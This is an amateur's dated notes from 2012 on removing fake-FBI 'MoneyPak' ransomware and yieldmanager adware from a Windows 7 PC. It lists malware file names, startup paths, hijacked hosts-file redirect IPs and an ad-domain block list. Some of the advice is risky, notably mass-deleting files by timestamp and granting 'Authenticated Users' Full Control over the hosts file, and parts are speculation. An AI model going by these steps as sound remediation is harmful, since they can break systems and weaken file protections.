        The lock virus files are (for me) pretty easy to recognize. Files and directories that turn up in the narrow time window search and have names that look like long random letter or number strings are very likely virus files. The (random).exe file (96k or 100k) is probably the key file, and I found two or  three copies of it (with same name, size, and timestamp),, and also another copy (same length and time stamp) but with a different filename consisting of a long random number string. My virus .exe filename in this attack was 'fsbpleuk.exe', but it is different in every attack. I used this filename ('fsbpleuk') to search the registry using Windows tool 'regedit', and sure enough I found a registry value pointing to [c:\programdata\fsbpleuk.exe], which I deleted along with the virus files.

Nature of the 'lock' screen files
       I found the 'lock' screen is not a single image file but about a dozen or so small, fragment image files and an associated .html files that pulls them together, and all resides on the hard drive. The virus created a subdirectory in the 'c:\programdata', which consisted of a long random letter string (hence it looks suspicious), and in there went the files associated with the lock screen. Curiously these fragment image files names for the lock screen were readable and with their function spelled out (in english), for example one was 'moneypak.png'.

Agent Ransack
       I have on my machine a very good, free, general purpose search program called: 'Agent Ransack'. This search engine is much (much!) better than Windows built-in search. With this tool (still in safe mode) I search all the c:\ directory for files changed within a 2 or 3 minute window (before and after) the identified virus file time. In a few minutes it generally comes up with two or three pages of files, and they can be sorted by time (to the second, Windows just shows files times to the minute). Since you know the name, location and approx time of at least one or two of the virus files from the malware program, find these files in the Agent Ransack list. Any files that have nearly the same file times (to the second) are very suspect and can probably be deleted. In fact I have found that I can generally delete nearly everything (dozens of files) within 30 seconds or so of the virus files without any problem. Most of these files are apparently temp files written by running programs. The only problem I ever had was I deleted the local copy of my emails and had to download them again from the server. I now to watch out for that file.

CCleaner
       Final clean up (still in safe mode) involves a registry search using text fragments from the virus files names (like 'isass') using Window's Regedit. Sometimes it finds something suspect in the registry and sometimes not. One online site recommended a general free cleanup tool called CCleaner. In one fell swoop this program will delete dozens of temp windows files and browser history files. Maybe not necessary, but seems like good practice. It's fast and easy and has not given me any problems. Finally empty the recycle bin and immediately reboot. It's important to clean out the Recycle bin, because I think some viruses can reload themselves from there. Everything should be back to normal.
-------------------------------------
Detail notes
     Unlock: F8 on reboot to enter Safe mode (no network)
                   I read that another way to get rid of the FBI screen is to disconnect machine from internet (pull cable), because the FBI
                       splash screen is not on the computer, it is being downloaded at startup (I don't think this is true)
        Fix:  run Malwarebytes Anti-Malware (free)    --- Disables the virus
                Or  --- before deleting with Malwarebytes, use explorer to find the times these files were installed. This is time of
                       attack. Search out other files with same file date and time (I use file search utility: Agent Ransack.)
                       This part is tricky, but delete suspect files with these same times.
                CCleaner from Piriform (free) --- general clean up utility, not specifically for this virus. Use it to clean
                       out browser history and empty Recycle bin
         Another possible fix is 'System Restore' if it has a restore point and will work! My experience with System Restore on
                                Windows7 has been bad, and I read it may not work, but others report it has worked for them.
                                 This is the Win7 System Restore file (open it to start system restore): C:\windows\system32\rstrui.exe
----------------------------------
(another update, Sept 26, 2012)
         I have gotten hit with this virus still again (or it is hiding and just returns). This time recovered by deleting dozens of files with time stamps within a couple of minutes of attack. This time used Malwarebytes only to find two key files (it misses some files) and from them got the exact attack time. There is info on this virus on the (real) FBI site. It says you do not have to open a file to get infected, just browse to the wrong site. FBI page identifies the virus as being installed by "Citadel Malware" (sold on open market by Russian hackers) and it installs a program identified as "Reveton Ransomware". Citadel Malware does it's work by exploiting a vulnerability in Java. (Interesting: Firefox just popped up a window saying 'Java Platform SE7 U5 10.5.1.255' has been known to cause security problems and suggests disabling it.)

Details on virus
       A google search led me to the first site below which has a lot of detail as to how the virus operates, what files do what, very useful. They (Anvisoft) have a (free) program (2nd link) that they say deletes the virus: 'Anvi Smart Defender'. Here is their outline and I can (to some extent) verify this since I just recovered manually today and kept notes on the files.

The reference identifies these virus files:
1) Delete   *.dll.lnk          in     C:\users\Window_7\Appdata\roaming\Microsoft\Windows\Start Menu\programs\startup
2) Delete    ctfmon.lnk      in     C:\users\Window_7\Appdata\roaming\Microsoft\Windows\Start Menu\programs\startup
                                                     yes, I found in this directory: ctfmon.lnk    1k
                                                    "This calls virus on startup", or it points to it so it runs.
                   I also had:       CTFMON.exe-[random].pf  25k  in         c:\windows\prefetch
                                          Isass.exe   44k    in         c:\programdata    (identified by Malewarebytes and related to ctfmon)
                     (probably)     gla.pad        81 Mb            in         c:\programdata  (dated 4 min later, but huge file)
3) Delete  rool0_pk.exe    in   C:\users\Window_7\Appdata\local\temp           "fixes the FBI moneypak"
               [random].mof   in   C:\users\Window_7\Appdata\local\temp
                     V.class       in   C:\users\Window_7\Appdata\local\temp   (for good measure, a Java file)
  (I didn't have any of the #3 files)

ctfmon notes
        I have no doubt the ctfmon.lnk (1k) in the directory shown above is a key virus file. However, a google search and a search of my c:\ drive shows multiple copies of ctfmon.exe (9 or 10k) that Google says is a Microsoft file. In my cleaned system I do not find ctfmon.lnk.

        forums.anvisoft.com/viewtopic-45-953-0.html

more manual delete info here
       http://deletemalware.blogspot.com/2012/07/remove-fbi-moneypak-ransomware.html

I have not tried this cleaner
       www.anvisoft.com/product/smartdefender.html?refer=forums
----------------------------------
(update Sept 2012)
        Incredibly I got hit with this virus a 2nd time, about six weeks later. Same routine, computer suddenly (after some delay) locks with FBI splash screen. Reboot in safe mode (F8) and run Anti-Malware to kill virus. This time I checked YouTube and found a bunch of fixes for this virus. One was manual showing entries in registry to check, another recommends the utilities above. I also did some manual file deletes (using 'Agent Ransack', an excellent free search utility) for files dated within a few seconds of the bad files found by Malwarebytes.
--------------------------
        In Aug 2012 my computer was suddenly taken over by virus that orders you to go to a store and send someone a bunch of money to unlock it. This virus is nasty it throws up detailed large splash screen (with an FBI logo no less!) and totally disables the computer. The trick to regain control is reboot hitting F8 to come up in safe mode. Choose 'Safe mode with networking' as this provides access to the internet.

        I rebooted into safe mode and knowing exactly when it had hit started looking for files with that time stamp to delete. My history has been that manually virus recovery rarely works anymore, viruses are too good at hiding, but I did make some progress and must have knocked out some of its files, because I at least got the computer unlocked and usable, though clearly still sick. I little searching found reference to the virus and a recommendation for Malware Bytes. I was familiar with this program as it is one of several virus programs I had previously, but all were lost in my April 2012 crash and were never replaced. Malware Bytes has cleaned my machine. The only residual problem I have is I myself deleted two files with odd names and the virus time stamp, and now on boot up I get dinged that these two files are missing, which I supposed may mean some residual of the virus is still in my machine and looking for at boot.

Adobe's fault?
        I read that this virus is (pretty much) Adobe's fault in that their update program had a defect that the virus people exploited. I can believe this as just before the virus hit, an Adobe update screen appeared. I later suspected the Adobe screen might have been fake, but it fits with the scenario that this was the vector by which the virus got in.

        Later I found several YouTube videos on the virus. The video of the first link is pretty much of a joke (unviewable with no narration), but in the text the details of virus and recovery are laid out for a manual recovery including registry keys to delete. I did not use this, I used Malware Bytes, so I don't know if it's right, but it look authoritative. I did check several of the registry items you should delete and none found, which is good. Also in one of the comments I guy says he called his ISP after he got hit, and they recommended the program I used (Malware Bytes).

        The 2nd link is a Youtube video that shows recovery using Malware Bytes and clean up with a 2nd free utility CCleaner from Piriform
        http://www.piriform.com/ccleaner/download

http://blog.yoocare.com/computer-locked-by-fbi-moneypak-virus-asking-to-pay-200-fine-to-unlock/
http://www.youtube.com/watch?v=pdUrMr0UqWc

My fake FBI warning screen (Oct 2012)
        On a recent attack I grabbed my tablet computer and photographed my fake FBI warning screen on my locked computer.

        Notice the blank green in the upper right corner labeled 'video recording ON'. I read that if your laptop has a webcam (I have no webcam), the picture from your camera shows up here. Nice touch. Notice also you are instructed to send "200$". Almost no one in USA writes a dollar amount with the dollar sign at the end. And there are odd phrases like "fine of two to five hundred minimal wages", "deprivation of liberty". From all this there is little doubt that whoever wrote this screen is not a US resident or native english speaker.

A different attack

Lock screen of the new nastier variant FBI Lock virus (captured Dec 24, 2012)
Hands in handcuffs -- nice touch
In Article 1 paragraph 'minimal' => 'minimum'

Advanced methods (from link below) for fighting FBI Lock virus (Dec 24, 2012)
        -- * If Windows’ Safe mode brings up a black screen, with “safe mode” in the four corners – Move your cursor to the lower left corner, where the Search box is usually visible in Windows Start Menu and it will come up, including the “Run” box. (haven't tried this, but if it works, this is helpful) (I later tried this on the 'black' Safe mode screen I forced, and as I suspected it does not work, no menu comes up.)

        -- * To get to 'System Restore' from 'Safe mode with command prompt'. Type in command line:
                            explorer”                                                 (press Enter)    (do it fast, in only 2-3 sec virus may block typing)
                             (my suggestion here is try Ctrl-Alt-Del, or type 'exit' then Ctrl-Alt-Del, to get to Task Manger)
                            (There's also a problem with just typing 'explorer' in Safe mode command window. I tried it, and it doesn't
                                work, it just brings up the Safe help screen. The command window defaults to c:\windows\system32
                                folder, but explorer.exe is in the directory below, so type 'cd..', then 'explorer'. This also works: close the
                                help screen window, then type 'explorer' a 2nd time.)
              in explorer navigate to:
                            c:\windows\system32\rstrui.exe                 (press Enter)   (This is System Restore, not best choice)

        -- * At boot the virus is called by a link (or shortcut) often called 'ctfmon.lnk' in Startup folder:
              (Important, the virus file is not 'ctfmon.exe' which is a system file!)
                            c:\users\Windows_7\Appdata\roaming\Microsoft\Windows\Start Menu\programs\Startup
                           (In my uninfected machine the only file in this folder is 'desktop.ini')

        -- Flash drive option:   (have not tried this, but it is simple if it works. I am however doubtful that a USB file is going
                   to load and run) "On another (clean) computer, download Malwarebytes and load the Mbam-Setup.exe
                    (or similar) file onto the flash drive. Remove the flash drive from the clean computer and insert it into the
                   affected machine, proceed to install Malwarebytes using the setup file located on the flash drive."

                    I have put Malwarebytes on a flash drive (more than the .exe was required), so if I remember I might try this
                    the next time I get attacked. In normal operation Malwarebytes runs OK from USB flash memory. (One problem I see
                    with this method though is that the Malwarebytes database is going to be out of date.)

        -- Remove hard drive and fix it remotely using a 2nd machine
                    A last resort, because a lot of work. The reference I found called for taking out the internal hard drive, moving a jumper
                    to make it a slave drive (IDE only, not SATA), then installing it internally in another machine to work on it, but this is
                    doing it the hard way.

                    Instead just use a drive conversion kit (power supply and cables, I bought one for $10) to convert an internal drive
                    to a USB drive, then clean it on a good machine and reinstall.

        --  I read the FBI lock virus is exploiting a vulnerability in Java

These tips from this detailed FBI lock article (Dec 2012)
            Although this reference is very comprehensive with seven different ways of attacking the FBI virus. They do not include my favorite method of doing a time window search using Agent Ransack to find the virus files. Nor do they mention the Ctrl-Alt-Del to Task Manager method to get to explorer in damaged Safe mode with a black screen.

         http://botcrawl.com/how-to-remove-the-fbi-moneypak-ransomware-virus-fake-fbi-malware-removal/

Updates (12/29/12)
        After finishing this essay, I got hit by a new variant of the FBI lock virus, luckily it shares the same flaws as the standard FBI lock virus, to wit, control can be regained by booting into Safe mode and virus locks the computer within seconds of downloading. Screen a little different, featured 'Dept of Justice'.

        The big difference is that while the virus .exe file is in the usual size range, here 211k, it also downloads a HUGE file of 92 Mybes. God knows what this huge file would do. Its other distinctive feature is its filename. The .exe file has what looks like a random letter file name ('wgsdgsdgdsgsd'), but the 92 Mbyte file uses the exactly the same letters in reverse order. A Google seach of the .exe filename gets a lot of hits. MalwareBytes labels the files of this virus:

                     Trojan.Ransom.SUgen
                     Trojan. FakeMS
                     Exploit.Drop.GSA
===============================================================================================

        In fighting an infection by nasty 'yield.manager' (and its related family), which repeatedly pops up adds covering web sites, I got further infected by aggressive add programs riding on the installers of free (supposedly) anti-malware programs. These parasitic programs installed aggressive tool bars ('IB Updater' and 'Incredibar'') on several browsers, in my case Chrome and Mozilla Firefox. Somehow in working to delete all this crap, and maybe in fighting the FBI lock virus, two Windows tools essential to fighting viruses got damaged: Windows registry editor tool 'regedit' would not run, and Safe mode screen icons disappeared leaving a black screen.

        After ten days of work, I think I have fixed all (or most) of these problems. The nasty tool bars that attached themselves to Chrome and Mozilla are gone. Regedit now runs and works fine. Safe mode icons are back too. It's hard to say the popups are 100% gone, but on favorite sites that had popups every minute, I have seen a popup in several days.

        Of course, it's a given is that all files, directories and registry entries that can be found are deleted. This pretty much handled my last attack, the nasty browser toolbars. The tool bar installer sprayed dozens of entries into the registry. Key word searches of the registry with regedit located the file locations. By hand I hand deleted the files and the dozens of registry entries. The browsers also helped. Mozilla threw up a screen saying the newly side-loaded toolbar was causing instability and asked that it be disabled. It said it could not delete it, because it had been universally loaded. In Chrome I was able to disable the aggressive toolbar too. But this approach didn't work with the popup adds, more was needed, and, of course, more was needed too to fix the regedit and Safe mode.

        Here are the key fixes:

               1) Microsoft System File Checker
                            Restored 'Regedit' and 'Safe mode' to their original state. Is 'System File Checker' another
                                  Microsoft hidden gem? (It gets good reviews.)
               2) 'Hosts' file edit ---  (c:\windows\system32\drivers\etc\hosts)
                            A vital part of the yield.manager virus strategy appears to be that it edits the system 'Hosts' file
                                 (used in translating URL names to URL numbers) such that it redirects to ad sites. The
                                 virus adds a few lines to this text file are hard to find and totally cryptic, so you need
                                 to know what you are looking for. Also Hosts is a hidden, protected system file that is
                                 very difficult to change. Cleaning up the Hosts file appears to have removed the popup
                                 'x' frames.
               3) Browser Site blocking
                            Block sites from from where adds are pulled. This is not a clean fix to popup adds but helps,
                                  because more often than not the popup ad window goes transparent, with just a frame 'x'
                                  remaining.
=============================================================================

      All of a sudden a week ago I started to get lot of really annoying popup adds that cover part of the screen, usually the lower left corner. They all have the same frame with a window close 'x' projecting in upper right. They are not browser specific.  Chrome shows the same popup frame as Opera. They only seem to show up on some sites (reliably on Andrew Sullivan). When one pops up and you close it, a few minutes later another pops up. They are not stopped by my browser popup setting: block 'unwanted' popups, and even setting it to 'block all popups' does not stop them.  In one case, Andrew Sullivan's blog site, a lower left corner window add would repeatably popup with a 7 sec delay after a page reload. A little research shows these annoying popups are associated with 'yield.manager' and sure enough I find my browser has a cookie from 'yield.manager'.

Overview
        It took a lot of work and several false starts, but I finally got rid of annoying popup ads from yield. manager. This attack is known to be a bitch and none of the anti-malware tools I tried couldn't touch it. Online you are told to fight this infection by deleting ad cookies, but this is a waste of time. Ad cookies are written all the time, deleting them does no good, they're soon back. Other sites say to disable 'javascript', because the popup windows are called by javascript code. Sure enough disabling javascript gets rid of the popups, but it messes up so many sites that it is not a practical fix.

        I did get some partial success in blunting the attack by having my browser block the handful of site from which the adds are pulled. This often, but not always, made the popup window, which is still there(!), transparent. Later I learned the yield.manager virus is known to add redirect lines to the hidden system files called 'hosts', and this I found was the key. After I undid the damage to the 'hosts' file the virus does, I found the popups were completely gone.

How to get rid of 'yield.manager' popups
        I finally came up with a clean fix to the popup problem, fix the 'hosts' file. It may not be at the root of the popup attack, but it appears to be a key component. I find fixing the 'hosts' file gets rid of the popups (frame and all). 'Hosts' is a hidden system file at the location below. In the same directory is the file 'hosts.txt', but the file that has been corrupted and needs to be fixed is the file 'hosts' (with no suffix).

                c:\windows\system32\drivers\etc\hosts

How to fix 'hosts' file
        The yield.manager virus adds some (URL redirect) lines to the 'hosts' text file that are easily missed as they are proceeded by hundreds of blank lines. Since 'hosts' is a text file, it can be edited with Notepad. Delete the added lines. This file should have only two active lines and be the same as 'hosts.txt' file.  Now comes the tricky part getting permission to write the new file. The virus makes this difficult, because after modifying the file it has tightened the file permissions.

** This works to rewrite 'hosts' file! (12/6/12)
        The recommended procedure online is often just steps 2) and 3) below, but I (and some others) have found this to be unreliable. What works for me is to first loosen file permissions as shown in step 1).

        1) Change 'hosts' file properties first
               Properties, Security ("Authenticated Users), Edit, Full Control, Apply, then unclick Read-only
        2) Notepad (run as administrator) can now overwrite 'hosts'
        3) May need to save file as "hosts" (with quotes, to prevent '.txt' suffix from being added)

'Temp34.exe' Trojan Lameshield
       Possibly related to the popups (maybe its root source) is a virus file 'Temp34.exe', which Malwarebytes identifies as 'Trojan Lameshield'. I found it on my machine, and it had started running a process called 'temp34.exe *32', which was visible in Task Manager. Fix is delete file and in Task Manager (Ctrl-Alt-Del) kill any process with a similar name it has started running.
------------------------
Detail notes
        From examining the html code I found that the popups are javascript code that loads from the web the frame (http://content.yieldmanager.edgesuite.net) and its contents (http://ad.yieldmanager.com). The Opera browser can disable javascript, and I find this kills the popups, but unfortunately 'javascript disabled' is not a practical setting as it messes up far too many sites, in particular, financial sites I use everyday become unusable.

        I have made some progress against the popups by having Opera block the content from the half dozen or so sites that source the frame and content. At some sites, like Andrew Sullivan, the popup is reduced to nothing by a tiny black 'x', a minor annoyance. In this case the frame must be either missing or transparent, but in a few sites the window remains a pain showing as an opaque white block.  I get the site to block from properties (and html code) of the popups. In Opera they are listed at [Tools, Preferences, Advanced, Content, Blocked Content]. Popups can also be right clicked and from the menu choose Block. This causes the site to be entered into the browser block content list.

        Try as I may (spending mucho hours over 2-3 days) I have been unable to find the root calling program. I delete cookies, clean out everything, search the registry and a little while later the popups and the same cookies are back. Either something remains on my machine I can't find or some site I commonly use is reinfecting me with these adds. (This comment was written before I discovered the 'hosts' file changes were connected with these popups.)

Blocked sites
        This list of blocked sites that works pretty well.

                    http:/ad.yieldmanager.com/*
                    http:/ad.yieldmanager.net/*
                    http:/yieldmanager.com/*
                    http:/yieldmanager.net/*
                   http:/content.yieldmanager.com/*
                   http:/content.yieldmanager.net/*
                    http://content.yieldmanager.edgesuite.com/*
                    http://content.yieldmanager.edgesuite.net/*
                    http://static.exoclick.com/*
                    http://static.exoclick.net/*
                    http://chitika.com/*
                    http://scripts.chitika.com/*
                   http://scripts.chitika.net/*

                    http://doubleclick.com/*
                    http://doubleclick.net/*
                    http://adbrite.com/*

                    http://ad.doubleclick.net                             (obtained from Sullivan code)

Comments
        -- 'goarticles' (client) is associated with chitika
        --  exoclick site is images for IRC channels
        -- blocking  site 'http://ad.doubleclick.net' (obtained from Sullivan code) is OK, it just blocks several (full width) adds for Slate computer.

Good reference (about yieldmanager popups)
         http://deletemalware.blogspot.com/2010/08/how-to-remove-adyieldmanagercom.html

        "Basically, you need to delete existing ad.yieldmanager.com cookies and then block third-party cookies from yieldmanager.com in your web browser. Here's the official YieldManager's opt-out cookie which stops the ability to keep track your browsing information: http://ad.yieldmanager.com/opt-out

Sullivan site code (with popup)
        The popup is 300 x 200 in size. A search for 300 on the page yields the code below. Note it's being called by 'http://ad.doubleclick.net' (This is Chrome browser with no blocked site, yet curiously I am getting the same transparent popup with 'x'.)

<div id="speedbump1"></div>
<script>
$(function() {
   var url='http://ad.doubleclick.net/adj/5480.iac.thedailybeast/dish;tile=2;sz=300x250;ord=' + (Math.random()*10000000000000000) + '?';

   writeCapture.writeOnGetElementById = true;
   var content = writeCapture.sanitize("<scrip" + "t src='" + url + "'><" + "/scri"  + "pt>");
   $("#speedbump1").html(content);
});
------------------------------
Right click the popup
        By right clicking the popups they seem to be of two types: some images downloaded (with the URL shown by right clicking) and others, even though they look like static images are very different, they have Flash settings. I used my three malware programs, which all came up negative. My good search program found some of the file and source names, and I deleted these files and cookies. My general cleaner program also found the same file and source names, and I used it to do mass deletions. These would seem to help for a while (maybe a few min to hour), but pretty soon the popups were back.

        Browsers can block sites, so even though far from ideal, one way to battle the download images, which I have seen recommended is to enter the source URL's into the block list. In Opera browser the place to enter URL's to be blocked is below.  (Another way to do it is just right click the popup and chose in the menu 'Block content'.)

            Tools, Preferences, Advanced, Content, Blocked Content

Here are the (root) addresses I am currently blocking, all of which were obtained from my popup addresses: (I am going to see if this works)

        http://content.yieldmanager.edgesuite.net
        http:/yieldmanager.net                                           (yieldmanger.net is a cookie)
        http://scripts.chitika.net                                       (http://scripts.chitika.net/static/css/goarticles550x250.css)   ('goarticles' is client)
        http://static.exoclick.com
                 Exoclick say it is an IRC-challen image cache ... "This site only takes links to images from IRC-channels and downloads the image to this cache!" It has an index showing it has thousands of images of all kinds.

Not browser specific
        This is not an Opera problem. The same popups appear on Chrome.

Chrome provides a lot of tools to look at the html code:

             script                                 javascript                                                         (can javascript be disabled in Opera? yes under Content)
             popup src (source)           http://ad.yieldmanager.com                                          (suspect this is the key manager)
             frame src (source)             http://content.yieldmanager.edgesuite.net/atoms/         (height=250, width=300)
             ????                                  http://dg.specificclick.net

Controlled test of javascript on/off
        I finally came across a reproducible way to bring up a popup. A popup appeared on Sullivan page, so reload page (don't scroll) and popup reappears in 7 sec!  Works everytime. Now I am going to disable javascript (under Content) and see what happens. No popup! Reabling javascript. Yes, popups are back and I also see from the reload indicator on the bar that reloading is delayed by 10 or so as the browser goes out to download the damn popup window! Disabling Javascript again. Popups gone!

Kill the popups
        After 24 hours works I have figured out how to fully get rid of (lower left corner) popups. Whether this is a practical fix remains to be seen (it's not!). An examination of the popup code shows the script producing the popup add is 'javascript' code. It calls several URL's (starting at http://ad.yieldmanager.com) that set up the frame, its size and ad content. Javascript can be disabled in my browser and an on/off test showed at least one popup (in Sullivan) came and went every time. Thus it appears javascript controlled popup adds can be removed by:

                    Disable Javascript            (in Opera: Tools, Preferences, Content, Enable javascript on/off)

        There are javascript option settings too, but the only one I thought might work (detect context) didn't work.  I have read online that javascript in not very important and can be turned off. But the 64 dollar question is what else will now not work? Is it practical to leave it disabled?

        BAD NEWS  -- Tiaa-Cref and Vanguard both require Javascript enabled!

Very interesting -- partial fix
        Within minutes of blocking the three site above (and deleting the Opera cookie 'yieldmanager.net') I see something very interesting. The block is a partial fix. On my screen in a fixed location is the lower left corner delete X  (small black circle with an 'x'), but that's all! Apparently the calling program (trojan) is writing the 'x', but the (opaque) screen never loads, so the whole screen remains normal except for a super imposed 'x'. Or maybe Opera let's the 'x' though, so you can click on to see there is blocked content.

Full fix?
       Right clicking the first two floating 'x' I see and then choosing the Block site, up comes a screen tells me the image is blocked. In upper right when I click Details it tells me the image was blocked from 'http://content.yieldmanager.edgesuite.net'. The Opera blocked info window gives me the option to click on the 'blocked image box' to block future images from this source. So I do and it changes from grayed out to not grayed out. (Never worked this way again!) With that change sites formerly ad infected have been totally clean for the last couple of hours. Fingers crossed. Nope, 'x's are back, but still it's progress since no popups.

Simpler way to block sites
        Instead of typing in the URL of the site to be blocked Opera will do it for you. When a popup comes up, right click popup, choose the 'Block content' from menu, then tell Opera to block content from this site. Opera adds the URL to the block list.

Cookie deletions
        By right clicking popups I assembled a list of half a dozen or so key words. When I checked the Opera (very long) cookie list I found several of of my keyword. I probably should just have deleted all the cookies, but I started out with selective deletions. I found the suspicious cookies in several groups. I deleted all below that were on my list. Since cookies that started with ad. or ads. inherently looks like advertising and two of them I know are associated with my popup eruption, I deleted all the cookies beginning with 'ad'.

               http:/yieldmanager.net
               http://static.exoclick.com
               ads.crackmanager
               ad.yieldmanger.net
               (adxxxxxxxxxxxxx)

        Within an hour of deleting the above cookies and meanwhile only visiting a few trusted news sites I find the cookie 'ad.yieldmanger.net' is back! And not surprisingly the URL of a new popup includes 'yieldmanger.net'. This coolie has four component which are just long random names, but the properties of these can be looked at. When I do, I find they have times (to the second), and one is just a few minutes ago when I was reading news. I do a search around the cookie time window to see what files have been written. Find nothing at exactly this time and nothing definitive, however, the two large files AgGIUADxxxxxxx I keep deleting are back. This time I am deleting all Opera's cookies, then I can see more easily when new ones get written.

        Looking at my recent browser history, which seems to include all the redirects that occur, one below standout as suspicious. This is not a site I know nothing about, and when I push into it there is 'ad.yieldmanger'. 'yieldmanager' is the common keyword attached to the popup windows. I read it's not uncommon for trojan sites to pretend to be sypware removal sites.

                        spywareremove.com                                     (www.spywareremove.com is a recent cookie)
                             Remove ad.yieldmanager.com

        Google search not conclusive, but one 2009 report has a poster on Norton saying this site is not legitimate. I went on the site, and it's voice pitch certainly sounds like a scam!

        Cookie settings: I had Opera set on Accept cookies, so I changed it to a slighly more narrow, Accept cookies from sites I visit. I temp clicked Ask me before accpting cookies.

        Cookie delete: I can't find any Opera tool to delete all cookies, which is strange, or any easy way to do it. Maybe CCleaner can do it. Yup, it tells me I have nearly 400 cookies and it can delete them, so I am doing that along with having it clear Opera history and icons, etc. Sure enough Opera cookies nearly blank except for a few mail site that I manually deleted. So cookies now blank and I am supposed to be asked before any site (I visit) deposits one. Yikes my first click to NYT and it deposits not one, but a whole bunch including one with the words market in it. I am going to have to delete the request, because I can't browse with repeated cookie requests. I will instead enable Delete recent cookies on exit. (I later abanded 'delete recent cookies' too, because although it seemed that settings and logon names should be retained, they weren't and I had to keep retyping them which was too much of a pain.

        One click to NYT cause 13 cookies to be deposited under several different headings!!!

        Yikes, even starting with totally blank cookies, a single click on Andrew Sullivan gives (as before) a partially blocked (yieldmanger) popup. A bunch of cookies show, but nothing suspicious. It doesn't look like cookies are the driver! A registry search for yieldmanager comes up null.

Curious
         Even from a clean Opera (and a reboot) I still get partially blocked popups, but I notice two thing that are curious. It seems that only some sites trigger the popups, one that reliably does in Andrew Sullivan. I have to scroll some for the popup to show. The other curious thing is that on Sullivan the blocked popups are always transparent (only the 'x' shows), but on other sites the blocked popups are white opaque blocks.

Hosts hijack
        I am beginning to suspect strongly that the ad popups are tied in with redirects in a 'hosts' file. I read the purpose of this text file is to list redirect URL's when incorrect URL's are entered, but this can be hijacked by viruses to do hijacks. HijackThis tool always reports that it can't open the Host file, which it suggests is at

        c:\windows\system32\drivers\etc\hosts

        HiJackThis implies that hosts has 8 very suspect redirects to two URL's with these three names:   www.google-analytics.com, ad-emea.doubleclick.net, www.statcounter.com

               50.31.74.129
             217.23.13.202

        Sure enough when I google on above URL's I find someone else has exactly the same eight entries under a title from malware program "Hosts file hijack", but where is this file? When I look at the host.txt file in the above folder I find it is just comment lines with no body (and same for other hosts. txt files I find).

Host file (good) info
        http://answers.microsoft.com/en-us/windows/forum/windows_xp-system/how-to-fix-corrupted-etchosts-file/828b55b2-352f-43ed-b8a3-a77b25c58d6d

Microsoft says this is a hidden text file, which can be hijacked and can be user edited (with notepad).

Unhiding
        OK, progress. Even though I routinely have ckecked shows system files, there is another entry in Organize\Folder and Search Options\view\.  This is 'hide protected operating system files (Recommended)', which when I uncheck brings up a file in the above folder just named:

            'Hosts' (not host.txt) in c:\windows\system32\drivers\etc\         folder

        This is the file to edit!  Damn, Notepad shows nothing interesting in 'Hosts' and even though Hosts is 2k vs the host.txt which is 1k, and both files look exactly the same in Notepad (unless there are hidden lines). Try the filename 'localhost', it looks like 'host' might redirect here. (At this point I have not yet discovered the viruse's trick of hiding the added redirect lines by also adding hundreds of blank lines.)

Fixed Hosts
        I hope I have fixed the 'hosts' file to which the ad trojan had added redirect lines. c:\windows\system32\drivers\etc\hosts (no suffix) has had the offending text lines removed. However, it is now in Explorer labeled as a 'file', whereas the corrupted old hosts (renamed: hosts_old(infected) is labeled a 'system' file.

        I finally stumbled on the redirect lines in the Hosts file, and after a lot of screwing around, figure out how to write a new Host file. The new 'hosts' file has the six redirect lines deleted (50.31.74.129 and  217.23.13.202  both labeled: www.google-analytics.com, ad-emea.doubleclick.net, www.statcounter.com) deleted.

        1) I found the virus guys had hidden the six new ad redirect lines by the simple strategy of putting in hundreds of blank lines between it and the sample text, so it was a long scroll down. The only difference in appearance between the modified host file and host.txt (sample) is scroll bars appear.

        2) In Notepad it was trivial to delete the virus added redirect lines, but I found it impossible to save the new file. Notepad insisted on writing it as 'hosts.txt' rather than 'hosts'. Also could not rename the files. Not sure how I did it, but in Safe mode by various renamings I got the cleaned up txt file renamed 'hosts' and the corrupted txt file renamed 'hosts_old(infected)', however, the system properties are not fixed, with the old file labeled a system file and the new 'hosts' file is just a normal file. Not sure what this will do. (At this point I don't have a systematic procedure for fixing the 'hosts' file, because I didn't document my playing around and could never get it to work a 2nd time.)

Agressive Adobe Flash install is bringing in ad crap (12/4/12)
       Today got reinfected with more ad sofware crap that again changed (and locked) my 'hosts' file. Running HiJackThis it tells me it can't open 'hosts' file, and it shows the the redirects added to the file. This time besides the old doubleclick, statcounter and google-analytics there are some new ones like facebook.

        The new hosts file was written at exactly the same time as Adobe Flash install software automatically downloaded and very agressively poppped up a big window over my work asking to be installed. From the size of the Adobe file and its attributes it did look like it was probably from Adobe (now I suspect this is a fake, but who knows), but I am pretty sure that coming along with it is this agressive advertising crap that changes the 'hosts' file.

How to delete hosts file (update 12/4/12)
        From before I knew what needed to be done, just delete the added redirect lines at the end of the file. And like before I couldn't do it Notepad was unable to overwrite the file. It's read-only, and when I try to change the attribute, it tells me I don't have permission. Last time by screwing around with it I was somehow able to rewrite the 'hosts', but didn't really know how I did it. I tried this again and nothing worked.

        I found a web site discussing exactly this problem, and they had the same problem they couldn't change the 'hosts' file. They traced it down to the malware having changed file owner (group) to "Authenicated Users" making it impossible for anyone, even admistrators to change it. I checked my 'hosts' file and found the same thing, the only one able to change it was "Authenicated Users". This site came up with a low level fix involving some command line system utility called 'CACLS', which I don't understand that allowed them to add 'administrators' to the file's owner list.

* Run Notepad as admistrator to change 'hosts' file
        With some more googling, however, I discovered a much simple way to change the locked read-only 'hosts' file. The trick is to open Notepad as Administrator: right click Accessories, Notepad and select 'Run as administrator'. In Notepad then open 'hosts' at c:\windows\system32\drivers\etc\ and delete the added lines. Notepad opened as administrator I found can now overwrite the corrupted, locked, and read-only 'hosts' file. (Well it worked once, but when I tried it the next time it would not work!)

*         Hosts is the key file controlling the popups. After a few days with no popups, they were back. I checked with a quick HiJackThis scan and sure enough a few hours earlier someone had rewritten hosts.

        However, when I tried the above procedure it didn't work! I get an error message on save saying the file is read-only. Time to do more research.

** This works to rewrite Hosts file! (12/6/12)
    1) Change Hosts properties first
            Properties, Security ("Authenticated Users), Edit, Full Control, Apply, then unclick Read-only
    2) Notepad (run as administrator) can now overwrite 'hosts'
    3) May need to save file as "hosts" (with quotes)

(change properties back to 'read only' advises one poster to keep Microsoft from changing it? I am going to skip this step and see what happens)
---------------------------------
** Temp34.exe virus
        I did a Ctrl-Alt-Del and found a process running called 'temp34.exe *32' with description 'temp34.exe'. Looked suspicious. It's a large executable file downloaded only two days ago.    (c:\windows\temp\temp34.exe     752 Kb)   A google search turns up 'Spyware Removal' (http://www.spywareremove.com/file/temp34exe-322169/) saying they have 234 reports it is malware associated with 'Backdoor.Kelihos.F'

        And son of a gun while I am reading about it, the popups come back. I find hosts is again changed just a few hours after I fixed it, and I had been only on mainstream news sites in the meantime!

